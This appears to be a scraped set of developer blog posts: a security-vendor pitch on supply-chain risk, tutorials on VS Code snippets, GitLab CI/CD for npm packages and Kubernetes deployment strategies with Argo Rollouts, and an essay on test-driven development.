As U.S. Army Gen. **Keith Alexander** , aptly paraphrased — “ **Either you know you’ve been hacked, or you’ve been hacked and you don’t know you’ve been hacked** ,”
If you are authoring and distributing software as COTS or SaaS (agent, runtime observability, management-monitoring, transactions based, web-based, etc) you should concerned and stay on top of measuring your supply chain’s security posture.
> **What should we (as SaaS and software vendors) be measuring ?**
- Detecting **Vulnerabilities** (OWASP/NIST/MITRE ATT&CK) in your application source code (severity does not matter as a low severe vulnerability can be chained with a logic flaw to initiate an attack sequence)
- Detecting **Business logic flaws** in your application — example IDOR (Insecure Direct Object Reference)
- Detecting **sensitive data, secrets and token leaks** that can be weaponized to infiltrate your hosted applications.
- Detecting **vulnerable OSS** (open source software) that are exploitable on an exposed path
- Detecting risk of **insider attacks — ** _identify use of suspicious APIs and code flows that can be weaponized in an attack sequence_
These detection capabilities should not occur in isolation as context is lost if not correlated.
> **What should we do and how can ShiftLeft help?**
Let’s collectively examine the how we can protect ourselves from this situation
- Pay attention to every vulnerability reported (critical or non-critical) and determine if it can become a candidate of an attack chain. Even a simple vulnerability can be weaponized by a RaaS vendor in the dark-net.
- Classify your sensitive data and secrets and then determine its lineage, provenance and exposure/leak across all points in your software stack.
- Apply the same rigor/discipline of vulnerability discovery and disclosure with all sites of software development (multi-office, offshore development) and vendors that you partner with.
- Identify insider attacker risk, as a dissatisfied employee might decide to partner up with a RaaS developer to effectively infect an organization from the inside and then splitting the profit.
- Identify and regularly update open source libraries that are vulnerable and can be exploited on exposed API endpoints.
- Protect ALL endpoints using 2FA (not just a subset) and operate at heightened level of security

We at [ShiftLeft](https://www.shiftleft.io/) have been studying and provisioning advanced detection policies using [**code property graph**](https://www.shiftleft.io/technology/) since mid 2019 (that includes OWASP based vulnerabilities, sensitive data leaks, insider attacks, exploitable open source based vulnerabilities, exposed API endpoints). [Speak to us](https://www.shiftleft.io/contact/) and we can help assess and recommend more efficient processes and procedures.
* * * | vickieli7 |
756,674 | Custom Snippets in VS Code | Tired of writing the same code over and over again? or Want to save time in a... | 13,494 | 2021-07-12T04:48:39 | https://dev.to/cenacr007_harsh/custom-snippets-in-vs-code-23e8 | productivity, vscode, codenewbie, beginners | ## Tired of writing the same code over and over again?
or
## Want to save time in a Competitive Programming contest?
Rest Assured as VS Code allows you to create your very own code snippets to save time while programming.
What is a Snippet?
A prefix is what is used to trigger the snippet and the body will be expanded and inserted.
You can create snippets:
* Globally- which will be used for all programming languages across all folders.
* Project- custom snippets for each project separately.
* Language- create templates for each programming language you code in separately.
Not only that you can create multiple code snippets and use different prefixes to use your snippet of choice whenever you want.
Now let's dive right into it and see how we can do all of this:
**open VS Code > settings > user snippets**
You should see a drop-down menu as shown in the image below.

Now select the particular language for which you want to create the snippets by scrolling or searching for it (by language identifier) in the search box shown or you can also select the New Global Snippets file if snippet should appear for all languages.
Here I would be showing how to create 2 custom snippets for C++ :
* One that I use for normal programming.
* Another one that I use for competitive programming.
Select CPP(C++) from the drop-down menu for C++. You'll see text commented in between
a pair of curly braces { // }. The commented text contains some basic instructions on how
to create the snippet and an example code, you can either clear all of it or edit and use the same code.
## Normal Programming Code Snippet
here is how it looks in the `cpp.json` file
( I'll add the screenshot of the complete page below)

the "snippet-normal-c++" is the title you choose for your snippet
**prefix**: the word by which access your snippet while coding (basically when you type as in this case **"cpp"** while coding in a `.cpp` file vs code Intellisense automatically gives you suggestions from where you can hit enter and get your boilerplate code)
you can see the suggestions vs code gives in the image below:
(try this after creating your snippet and saving it)

**body**: this is where you write the code template you want, you can write them in between double quotes " " and separate them by using a comma(,) which is the typical syntax of a `.json` file.
**description**: you can add a little description if you want which will be displayed by the vs code IntelliSense.
Now one particular thing you might have noticed is the "$1" symbol which I have used.
That indicates the position where the cursor will be placed after the template has been copied.
Here is how the template looks like when used while coding -

## Competitive Programming Code Snippet
Why use `#include <bits/stdc++.h>` ? you might ask
It is a header file that includes every standard library. In programming contests, using this file is a good idea, when you want to reduce the time wasted in doing chores; especially when your rank is time sensitive
Also taking input of the number of test cases is a part of each question so that is why I have included that in the template I use.
But anyways that was me. You can design your code that fulfills your needs.
here is how the output of this snippet looks like:

Here is how the Competitive Programming Snippet looks like:

And here is how the complete `cpp.json` file looks like:

Hit **Ctrl+S** to save the settings...
You can add as many templates as you want and fine-tune them according to your need.
So what are you waiting for? Go and create your snippet right now. KEEP CODING !!!
If you prefer to watch videos to learn something here is a [YouTube](https://www.youtube.com/watch?v=cVBM5Bn5yjI) video I found helpful while learning how to create custom snippets:
{% youtube cVBM5Bn5yjI %}
There are many more features that you can add to your template and even download some extensions for that. To know more about that you can read Snippets in [Visual Studio Code](https://code.visualstudio.com/docs/editor/userdefinedsnippets).
### If you liked my content consider following me on [Twitter](https://twitter.com/cenacr007_harsh)
Also if you got any questions feel free to ping me on Twitter.
### Thank You! 😊
| cenacr007_harsh |
756,827 | Gitlab CI/CD for npm packages | A couple of weeks ago the IT team in my company talked about having repositories for the packages we... | 0 | 2021-07-21T14:56:37 | https://dev.to/kristijankanalas/gitlab-ci-cd-for-npm-packages-4ncj | devops, npm, git, gitlab | A couple of weeks ago the IT team in my company talked about having repositories for the packages we make for our PHP applications so we can switch to a more natural use of composer. We left the meeting with ideas but not with a concrete solution nor a promise to research this topic.
Few days ago I needed to make a javascript package, after creating a repository on our gitlab I noticed an option for `Packages & Registries`. As it blew my mind that such an option exists I decided to research it a little and use it for this javascript package if possible.
Here is what I learned in the process.
## Options
Gitlab offers a few registries you can work with: Composer, Conan, Maven, NPM, NuGet, PyPi. I have only tried out the NPM registry, but others should also be easy to work with.
## Publishing an NPM package to registry
This was actually my first time making an NPM package. So I would like to recommend this post [Step by Step building and publishing an NPM typescript package](https://itnext.io/step-by-step-building-and-publishing-an-npm-typescript-package-44fe7164964c) to the first timers like me. It was very easy to understand and no steps were missed.
First of all in your `package.json` you should scope your project cause Gitlab requires packages to be scoped.
For example:
```json
{
"name": "@scope/example-package-name",
"version": "1.0.0"
}
```
After we have this setup, if we use a `.npmrc` file or `npm config set registry` we can tell npm where we want it to publish our package. Looks something like this:
```
//gitlab.example.com/api/v4/projects/${PROJECT_ID}/packages/npm/:_authToken=${GITLAB_DEPLOY_TOKEN}
```
If the repository is set to internal or private you need to use a Gitlab deploy token. On how to get one, you can read at [Deploy tokens](https://docs.gitlab.com/ee/user/project/deploy_tokens/) documentation.
After running `npm publish` you should be able to see your package in the registry of your repository.

And you should be able to see a version 1.0.0 that says it was pushed manually.
## CI/CD
To make our life and the life of our colleagues better we can make good use of the gitlabs CI/CD system here.
We can use `.gitlab-ci.yml` configuration that looks like this:
```yaml
stages:
- build
- test
- publish
build:
stage: build
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: push
script:
- echo "//gitlab.example.com/api/v4/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=${CI_JOB_TOKEN}">.npmrc
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm install
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run build
test:
stage: test
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run test
lint:
stage: test
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run lint
publish:
stage: publish
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm version --no-git-tag-version ${CI_COMMIT_TAG}
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm publish
```
Notable points:
- In build stage we make a `.npmrc` file that contains the path of the registry made by using the CI environment variables
- All the stages run only on **tags**, a special way to tell the CI/CD system to only activate when you tag the code in your repository
- We build a cache for node_modules, lib and .npmrc as such we limit the number of scripts we need to run after the build step
- Only the build step makes the cache others only use it, it is defined by push/pull policy
- In publish stage we use a `npm version --no-git-tag-version ${CI_COMMIT_TAG}` command. `npm version` is a noisy command that tags and commits code if it detects a directory being a git repository so that's why we use `--no-git-tag-version` here. As the stage was triggered by us tagging the code, we have the `${CI_COMMIT_TAG}` environment variable available to use for package versioning. After that we just publish the package.
**Note**
I didn't have a gitlab runner that was setup to use docker normally nor did I have node and npm installed on the machine so I had to use `docker run` commands like shown. So... not the most elegant way of doing it.
The end result is this:

Now the developers don't have to run any scripts locally, just to commit to the repository and tag the code.
If you'd like to support me writing feel free to buy me a cup of coffee.
[](https://www.buymeacoffee.com/wSd4q6U)
| kristijankanalas |
756,832 | Why you might not want to use TDD? | Test Driven Development is a technique that changes the way we think about tests and programming. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier. | 0 | 2021-07-12T09:09:55 | https://dev.to/olaqnysz/why-you-might-not-want-to-use-tdd-26jf | programming, tdd, tests, challenges | ---
title: Why you might not want to use TDD?
published: true
description: Test Driven Development is a technique that changes the way we think about tests and programming. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier.
tags: programming, tdd, tests, challenges
cover_image: https://szkolatestow.online/wp-content/uploads/2021/07/tdd.png
---
I’m a big fan of Test Driven Development. I’ve used it when preparing educational materials, but also in commercial projects. Not only that, but I believe that this technique changes the way we think about tests. Really! Even if you don’t use it daily, once learned, it will influence all your future tests. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier.
#Where to start?
First of all, TDD is hard to start. Many people get lost, because they don’t really know what to do. The process is fairly simple. Just three steps: write a test, write the simplest possible code, and refactor both. Simple. However, when it comes to details, lots of engineers get lost. Which test should I write first? What does a simple solution mean? Should I refactor a big chunk already? Things that are simple are not always easy to work with. There might be lots of confusion and question marks in your head at the beginning.
And these red tests… Programmers usually don’t write tests to check anything. We write them to prove that our code works. Quite a difference! Our goal is not to break the code, but to show that we did a great job. Green color is the best proof. Red lines usually mean that something is wrong, something doesn’t compile, or we just broke it. It doesn't feel good. During the Test Driven Development cycle, we see red all the time, and we get used to it with time. What’s more, we realize that red tests are the most helpful ones. We get suspicious when a test is always green.
I have some really bad news for experienced devs. It’s harder for you than for less experienced folks. I’m sorry, but that’s how it works for many other skills as well. The more experience you have, the more difficult TDD is at the beginning, because you have acquired different habits. It doesn’t matter if you’ve written tests before or not. Starting with a test, when you’ve always jumped straight into a solution, is damn hard.
My advice here is to watch some live coding sessions. Even if you’ve read the best books and checked out some tutorials. Live coding gives you an opportunity to see the thinking process. You witness how decisions are made and what is the flow. You may want to follow the same steps or disagree at some points. But you have something to start with, some initial thesis to be verified. Otherwise, it’s easy to get stuck.
#Should you always follow the process?
Test Driven Development gives you simple building blocks to help you create some nice and well-tested pieces of code. They are so simple that it’s tempting to skip them or modify them. Especially, if you feel like something seems odd you might want to change the process slightly, just to suit your needs. The more you do it, the less TDD it is.
I know that TDD might seem counterintuitive at times, but it IS well-designed. It was created by people who had written thousands of lines of code, and it was tested by thousands of engineers around the world. If you don’t “feel it”, it might be because you’re still in the process of mastering it. I remember one time we were organizing TDD live coding with my friend, and he suggested that we should prepare some code before. I said that it was a tutorial for people who were just starting, writing the code beforehand seemed like breaking the rules from the very beginning. He didn’t seem convinced, but he agreed. We ended up with a much better code that he thought we could have written. This story showed me that TDD has more power than we think.
One of the main problems with mastering TDD is that you don’t see all the benefits instantly. When I started with Machine Learning, I had had a working script differentiating cats from dogs done in two hours. Back in school, when I wrote my first lines of code in Logo, it took me a couple of minutes to see the turtle moving around. When I started using TDD, it took me days to see how it improves my programming style. And it was only because I had taken part in an intense workshop. If I had practiced an hour every day, it would probably have taken me weeks.
The recommendation for TDD beginners is just to follow the process without judging. In IT we love judging everything from the first minutes. We tend to look at things as if they were black or white. There is no grayscale. If something doesn’t work for us right now, it’s probably a piece of crap. That’s why, we tend to give up so easily when learning new tools or new skills. If you trust the TDD process and follow it without judging, it will lead you to the code you’d not have written otherwise.
#How to level up?
When you start working with TDD, you first start with Katas. These are fairly simple problems that have limited business logic and requirements that don’t change. It’s not a coincidence. When you learn a new skill, you should focus on this skill only. It’s like an exercise at the gym. Before you move to CrossFit exercises, you need to learn how to warm up and work out each group of muscles. Our neural system needs to get used to doing exercises before muscle memory is created.
Moving from Kata to business problems can be tricky as well. In projects, we don’t always have all the requirements from the start. There is a possibility that these requirements will change on the way. There are lots of other challenges, like working with clients, continuous integration process, monitoring, bug fixing etc. We cannot focus only on the code and tests. This might make TDD more complex and require a more flexible approach. However, TDD is a very agile process, and because of that it’s perfect for changing circumstances. We just need to prepare before moving onto the “battlefield”.
Holding one’s horses might be hard in this situation. Especially when you start noticing the benefits of a well-tested code created using the Test Driven Development process. I observe this when my students do their first steps using the TDD. Most of them instantly fall in love with the process and want to use it in their project after trying with just one Kata. This is very promising, but might be overwhelming for them. I usually ask them to try one or two more Katas, usually more complex ones.
Real projects are multidimensional. Tools, requirements, processes, and sometimes even people, are constantly changing. We need to learn many things on a daily basis. When we try to use a new skill too early, we can end up disappointed. I’ve heard many stories about TDD working well only for simple problems. I know it’s not true, because I have been using it for business logic, and I also know lots of other engineers who are using it as well. But I totally get this. People move to real projects too early, before they are ready. So they just become overwhelmed, and they give up.
The best way to succeed in using TDD is to practice. Practice, practice, practice, and then move to “real life” problems. Try a couple of simple Katas, then try solving them using pair programming, then organise coding dojo or mob programming in your team. You will probably hit the wall a couple of times, but within a sandbox environment, it will be easy to overcome these challenges.
#Conclusion
Test Driven Development is a great technique, and it can totally change the way you code. However, it’s not easy to start, it might feel counterintuitive at the beginning and many people easily give up before they see the real benefits in their projects. It’s worth the time to prepare before you try using TDD in your projects. You should invest some time and watch a few live coding sessions, especially if it’s possible to ask questions. This will help you understand the decision-making process. No matter how silly the process might seem at times, you should follow it without judging. The more humble you are at the beginning of the learning process, the faster you will see positive results. Move to the business logic of your project only when you’ve already practiced for some time using different forms of exercise and feel confident in doing complex Katas. I believe you can do it!
Of course, you might ignore all these pieces of advice, but then don’t blame the TDD process that it didn’t work for you.
---
If you enjoyed this article, you can check out my presentation on this topic during The First International TDD Conference [HERE] (https://youtu.be/-_noEVCR__I?t=10917) | olaqnysz |
757,089 | Kubernetes: Deployment Strategies types, and Argo Rollouts | One of the goals of the ArgoCD implementation in our project is to use new Deployment Strategies... | 0 | 2021-07-13T05:54:38 | https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/ | kubernetes, devops, todayilearned | ---
title: Kubernetes: Deployment Strategies types, and Argo Rollouts
published: true
date: 2021-07-12 07:31:40 UTC
tags: kubernetes,devops,todayilearned
canonical_url: https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/
---

One of the goals of the [ArgoCD](https://rtfm.co.ua/en/category/ci-cd-en/argocd-en/) implementation in our project is to use new Deployment Strategies for our applications.
In this post, we will observe deployment types in Kubernetes, how Deployment is working in Kubernetes and a quick example of the Argo Rollouts.
- [Deployment Strategies and Kubernetes](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Deployment_Strategies_and_Kubernetes)
- [Recreate](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Recreate)
- [Rolling Update](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Rolling_Update)
- [Kubernetes Canary Deployment](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Kubernetes_Canary_Deployment)
- [Kubernetes Blue/Green Deployment](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Kubernetes_BlueGreen_Deployment)
- [Deployment and ReplicaSet](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Deployment_and_ReplicaSet)
- [Argo Rollouts](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Argo_Rollouts)
- [Install Argo Rollouts](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Install_Argo_Rollouts)
- [kubectl plugin](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#kubectl_plugin)
- [An application's deploy](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#An_applications_deploy)
### Deployment Strategies and Kubernetes
Let’s take a short overview of the deployment strategies which are used in Kubernetes.
Out of the box, Kubernetes has two main types of the `.spec.strategy.type` - the _Recreate_ and _RollingUpdate_, which is the default one.
Also, you can realize a kind of Canary and Blue-Green deployments, although with some limitations.
Documentation is [here>>>](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#strategy).
#### Recreate
The most simple and straightforward type: during such a deployment, Kubernetes will stop all existing pods and then will spin up a new set.
Obviously, you’ll have some downtime during this, as first old pods need to be stopped (see the [Pod Lifecycle — Termination of Pods post](https://rtfm.co.ua/en/kubernetes-nginx-php-fpm-graceful-shutdown-and-502-errors/#Pod_Lifecycle_-_Termination_of_Pods) for details), and only then new will be created, and then they needs to pass [Readiness](https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/) checks, and during this process, your application will be unavailable for users.
Makes sense to b used if your application can not work with different versions at the same time, for example due to limitations of its databases.
An example of such a deployment:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy
spec:
replicas: 2
selector:
matchLabels:
app: hello-pod
version: "1.0"
strategy:
type: Recreate
template:
metadata:
labels:
app: hello-pod
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
```
Deploy its `version: "1.0"`:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy created
```
Check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-77bcf495b7-b2s2x 1/1 Running 0 9s
hello-deploy-77bcf495b7-rb8cb 1/1 Running 0 9s
```
Update its `label` to the `version: "2.0"`, redeploy and check again:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-dd584d88d-vv5bb 0/1 Terminating 0 51s
hello-deploy-dd584d88d-ws2xp 0/1 Terminating 0 51s
```
Both pods were killed, only after this, new pods will be created:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-d6c989569-c67vt 1/1 Running 0 27s
hello-deploy-d6c989569-n7ktz 1/1 Running 0 27s
```
#### Rolling Update
The RollingUpdate is a bit more interesting: here, Kubernetes will run new pods in parallel with the old, then will kill the old version and will leave new. Thus, during deploy some time will work both old and new versions of an application. Is the default type of Deployments.
With this approach, we have zero downtime as during an update we have both versions running.
Still, there are situations when this approach can not be applied, for example, if during start, pods will run [MySQL migrations](https://rtfm.co.ua/en/kubernetes-running-sql-migrations-with-kubernetes-job-and-helm-hook/) that will update a database schema in such a way, that the old application’s version can’t use.
An example of such deployment:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy
spec:
replicas: 2
selector:
matchLabels:
app: hello-pod
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 0
maxSurge: 1
template:
metadata:
labels:
app: hello-pod
version: "1.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
```
Here, we’ve changed the `strategy.type: Recreate` to the `type: RollingUpdate`, and added two optional fields that will define a Deployment behavior during an update:
- `maxUnavailable`: how many pods from the replicas can be killed to run new ones. Can be set as a number or percent.
- `maxSurge`: how many pods can be created over the value from the `replicas`. Can be set as a number or percent.
In the sample above, we’ve set zero in the `maxUnavailable`, i.e. we don't want to stop any existing pods until new will be started, and `maxSurge` is set to 1, so during an update, Kubernetes will create one additional pod, and when it will be in the Running state, Kubernetes will drop one old pod.
Deploy with the 1.0 version:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy created
```
Got two pods running:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-dd584d88d-84qk4 0/1 ContainerCreating 0 3s
hello-deploy-dd584d88d-cgc5v 1/1 Running 0 3s
```
Update the version to 2.0, deploy it again, and check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-d6c989569-dkz7d 0/1 ContainerCreating 0 3s
hello-deploy-dd584d88d-84qk4 1/1 Running 0 55s
hello-deploy-dd584d88d-cgc5v 1/1 Running 0 55s
```
We got one additional pod beyond the value of the replicas.
#### Kubernetes Canary Deployment
The Canary type implies creating new pods in parallel with old ones, in the same way as the Rolling Update does, but gives a bit more control over the update process.
After running a new version of an application, some part of new requests will be routed to it, and some part will proceed using the old version.
If the new version is working well, then the rest of the users will be switched to the new one and old pods will be deleted.
The Canary type isn’t included to the `.spec.strategy.type`, but it can be realized without new controllers by Kubernetes itself.
In doing so, the solution will be rudimentary and complicated in management.
Still, we can do it by creating two Deployments with different versions on an application, but both will be using a Service with the same set of `labels` in its `selector`.
So, let’s create such a Deployments and a Service with the `LoadBalancer` type.
In the Deployment-1 set `replicas: 2`, and for the Deployment-2 - 0:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy-1
spec:
replicas: 2
selector:
matchLabels:
app: hello-pod
template:
metadata:
labels:
app: hello-pod
version: "1.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
lifecycle:
postStart:
exec:
command: ["/bin/sh", "-c", "echo 1 > /usr/share/nginx/html/index.html"]
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy-2
spec:
replicas: 0
selector:
matchLabels:
app: hello-pod
template:
metadata:
labels:
app: hello-pod
version: "2.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
lifecycle:
postStart:
exec:
command: ["/bin/sh", "-c", "echo 2 > /usr/share/nginx/html/index.html"]
---
apiVersion: v1
kind: Service
metadata:
name: hello-svc
spec:
type: LoadBalancer
ports:
- port: 80
targetPort: 80
protocol: TCP
selector:
app: hello-pod
```
With the `postStart` let's rewrite an NGINX's index file so we can see which pod accepted a request.
Deploy it:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy-1 created
deployment.apps/hello-deploy-2 created
service/hello-svc created
```
Check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-1-dd584d88d-25rbx 1/1 Running 0 71s
hello-deploy-1-dd584d88d-9xsng 1/1 Running 0 71s
```
Currently, the Service will route all the traffic to pods from the Deployment-1:
```
$ curl adb469658008c41cd92a93a7adddd235–1170089858.us-east-2.elb.amazonaws.com
1
$ curl adb469658008c41cd92a93a7adddd235–1170089858.us-east-2.elb.amazonaws.com
1
```
Now, we can update the Deployment-2 and set `replicas: 1`:
```
$ kubectl patch deployment.v1.apps/hello-deploy-2 -p ‘{“spec”:{“replicas”: 1}}’
deployment.apps/hello-deploy-2 patched
```
We’ve got the pods running with the same `label app=hello-pod`:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-1-dd584d88d-25rbx 1/1 Running 0 3m2s
hello-deploy-1-dd584d88d-9xsng 1/1 Running 0 3m2s
hello-deploy-2-d6c989569-x2lsb 1/1 Running 0 6s
```
And our Service will route 70% of the traffic to pods from the Deployment-1, and the rest to the pods from the Deployment-2:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
2
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
2
```
After we will check that version 2.0 is working and have no errors, we can delete the old version and scale up the new one to 2 pods.
#### Kubernetes Blue/Green Deployment
Also, in the same way, we can create a kind of blue-green deployment when we have an old (_green_) version, and a new (_blue_) version, but all traffic will be sent to the new. If we will get errors on the new version, we can easily swatch it back to the previous version.
To do so, let’s update the `.spec.selector` field of the Service to chose pods only from the first, "green", deployment by using the label _version_:
```
...
selector:
app: hello-pod
version: "1.0"
```
Redeploy and check:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
```
Now, change the selector to the `version: 2` to switch traffic to the "blue" version:
```
$ kubectl patch services/hello-svc -p ‘{“spec”:{“selector”:{“version”: “2.0”}}}’
service/hello-svc patched
```
Check it:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
2
$ curl adb***858.us-east-2.elb.amazonaws.com
2
```
After everything is working, we can drop the old version and the “blue” one will become “green”.
When using Canary and Blue-Green deployments with the solutions described above, we’ve got a bunch of issues: need to manage various Deployments, check their versions and statutes, check for errors, etc.
Instead, we can do the same with Istio or ArgoCD.
Istio will be discussed later, and at this time let’s take a look at how this can be done with ArgoCD.
### Deployment and ReplicaSet
Before going forward, let’s see how Deployment and updates are working in Kubernetes.
So, [Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) is a Kubernetes type where we can describe a template to create new pods.
After creating such a Deployment, under the hood, it will create a [ReplicaSet](https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/) object which manages pods from this Deployment.
During a Deployment update, it will create another ReplicaSet with a new configuration, and this ReplicaSet in its turn will create new pods:
See [Updating a Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#updating-a-deployment).
Each pod created by a Deployment has a ReplicaSet link, and this ReplicaSet has a link to a corresponding Deployment.
Check the pod:
```
$ kubectl describe pod hello-deploy-d6c989569–96gqc
Name: hello-deploy-d6c989569–96gqc
…
Labels: app=hello-pod
…
Controlled By: ReplicaSet/hello-deploy-d6c989569
```
…
This pod is _Controlled By: ReplicaSet/hello-deploy-d6c989569_, check this ReplicaSet:
```
$ kubectl describe replicaset hello-deploy-d6c989569
…
Controlled By: Deployment/hello-deploy
…
```
Here is our Deployment — _Controlled By: Deployment/hello-deploy_.
And the ReplicaSet template for pods is just the content of the `spec.template` of its Deployment:
```
$ kubectl describe replicaset hello-deploy-2–8878b4b
…
Pod Template:
Labels: app=hello-pod
pod-template-hash=8878b4b
version=2.0
Containers:
hello-pod:
Image: nginxdemos/hello
Port: 80/TCP
Host Port: 0/TCP
Environment: <none>
Mounts: <none>
Volumes: <none>
Events: <none>
```
Now, let’s go to the Argo Rollouts.
### Argo Rollouts
Documentation — [https://argoproj.github.io/argo-rollouts](https://argoproj.github.io/argo-rollouts).
Argo Rollouts is another Kubernetes Controller and a set of Kubernetes Custom Resource Definitions, that together allow creating more complicated deployments to Kubernetes.
it can be used alone or can be integrated with Ingress Controllers such as NGINX and AWS ALB Controller, or with various Service Mesh solutions like Istio.
During a deployment, Argo Rollouts can perform checks of the new application’s version and run rollback in case of issues.
To use Argo Rollouts instead of Deployment we will create a new type - Rollout, where in the `spec.strategy` a deployment type and parameters will be defined, for example:
```
...
spec:
replicas: 5
strategy:
canary:
steps:
- setWeight: 20
...
```
The rest of its fields are the same as the common Kubernetes Deployment.
In the same way as Deployment, Rollout uses ReplicaSet to spin up new pods.
During this, after installing Argo Rollouts you still can use a standard Deployment with their `spec.strategy` and new Rollout. Also, you can easily migrate existing Deployments to Rollouts, see [Convert Deployment to Rollout](https://argoproj.github.io/argo-rollouts/migrating/).
See also [Architecture](https://argoproj.github.io/argo-rollouts/architecture/#architecture), [Rollout Specification](https://argoproj.github.io/argo-rollouts/features/specification/) и [Updating a Rollout](https://github.com/argoproj/argo-rollouts/blob/master/docs/getting-started.md#2-updating-a-rollout).
#### Install Argo Rollouts
Create a dedicated Namespace:
```
$ kubectl create namespace argo-rollouts
namespace/argo-rollouts created
```
Deploy necessary Kubernetes CRD, ServiceAccount, ClusterRoles, and Deployment from the manifest file:
```
$ kubectl apply -n argo-rollouts -f [https://raw.githubusercontent.com/argoproj/argo-rollouts/stable/manifests/install.yaml](https://raw.githubusercontent.com/argoproj/argo-rollouts/stable/manifests/install.yaml)
```
Later, when we will install it in Production, the [Argo Rollouts Helm](https://github.com/argoproj/argo-helm/tree/master/charts/argo-rollouts) chart can be used.
Check a pod — it’s the Argo Rollouts controller:
```
$ kubectl -n argo-rollouts get pod
NAME READY STATUS RESTARTS AGE
argo-rollouts-6ffd56b9d6–7h65n 1/1 Running 0 30s
```
#### kubectl plugin
Install a plugin for the `kubectl`:
```
$ curl -LO [https://github.com/argoproj/argo-rollouts/releases/latest/download/kubectl-argo-rollouts-linux-amd64](https://github.com/argoproj/argo-rollouts/releases/latest/download/kubectl-argo-rollouts-linux-amd64)
chmod +x ./kubectl-argo-rollouts-linux-amd64
$ sudo mv ./kubectl-argo-rollouts-linux-amd64 /usr/local/bin/kubectl-argo-rollouts
```
Check it:
```
$ kubectl argo rollouts version
kubectl-argo-rollouts: v1.0.0+912d3ac
BuildDate: 2021–05–19T23:56:53Z
GitCommit: 912d3ac0097a5fc24932ceee532aa18bcc79944d
GitTreeState: clean
GoVersion: go1.16.3
Compiler: gc
Platform: linux/amd64
```
#### An application’s deploy
Deploy a test application:
```
